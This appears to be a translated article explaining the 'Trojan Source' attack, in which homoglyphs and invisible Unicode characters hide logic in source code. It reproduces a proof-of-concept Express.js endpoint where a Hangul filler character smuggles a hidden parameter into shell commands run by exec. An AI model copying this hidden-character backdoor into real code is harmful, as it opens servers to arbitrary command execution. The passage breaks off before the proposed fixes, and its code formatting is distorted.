Imagine, for a moment, a back door embedded in a programming code that is overlooked by any human reviewer And few IDEs help detect: no matter how thoroughly they check, the malicious code is still perfectly legitimate. Well, stop imagining it …

… Because a group of researchers have already made it clear that such an attack exists: a ‘paper’ published a few days ago by the University of Cambridge has shown that it is possible apply it to some of the most popular programming languages today.





This attack, dubbed ‘Trojan Source’ (Trojan code) takes advantage of two little-known characteristics of texts:

The homoglyphs: Characters exactly the same even though they represent different unicode codes. For example, a string like “aBeHKopcTxy” can refer to very different letters depending on whether we are using the Latin or Cyrillic alphabet. And this also includes certain invisible characters, which are seen as simple spaces without being.

The bidirectional Unicode mechanism: a function that allows text blocks written in alphabets written from right to left to coexist with others written from left to right.

Let’s see an example

Security researcher Wolfgang Ettlinger, director of Certitude Consulting, presents on his blog some code snippets that serve as proof of concept for this type of attack.

The first would be something as simple as this:

if (environmentǃ = ENV_PROD) {

In theory, we are telling a program to do something if the value of ‘environment’ does not match that of ENV_PROD ‘, with ‘! = “acting as inequality operator…

…but actually that ‘!’ it is not an exclamation, but a consonant of some African languages ​​that we know as alveolar click, so it is not part of the operator, but of the variable name.

Another example of this is the following text:

const express = require (‘express’); const util = require (‘util’); const exec = util.promisify (require (‘child_process’). exec); const app = express (); app.get (‘/ network_health’, async (req, res) => { const {timeout, ㅤ} = req.query; const checkCommands = [ 'ping -c 1 google.com', 'curl -s http://example.com/',ㅤ ]; try {await Promise.all (checkCommands.map (cmd => cmd && exec (cmd, {timeout: + timeout || 5_000}))); res.status(200); res.send('ok'); } catch (e) { res.status(500); res.send('failed'); } }); app.listen (8080);

In theory, that script does little more than run two operating system commands (‘ping’ and ‘curl’) with a series of parameters referred to URLs. There is also a variable, ‘timeout’, which limits the execution time of the command. Nothing weird, everything – as we said before – apparently legitimate.

However, in two lines of the text above the space is not actually a space, but a character named ‘Hangul fill’, extracted from the Korean alphabet, which does not separate words, but only represents the absence of a glyph.

In such a way, that ‘space’ actually functions as a word and therefore it can easily act as a variable in JavaScript. This is how those lines could be read:

const {timeout, u3164} = req.query; … ‘curl -s http://example.com/’, u3164

This completely alters the programming logic of the script, by introducing additional variables that can be used to cast parameters that would execute arbitrary text if the script in question were available on a web server.

Seeing this, the authors of the paper propose some fixs to mitigate the impact of this kind of cyber attack: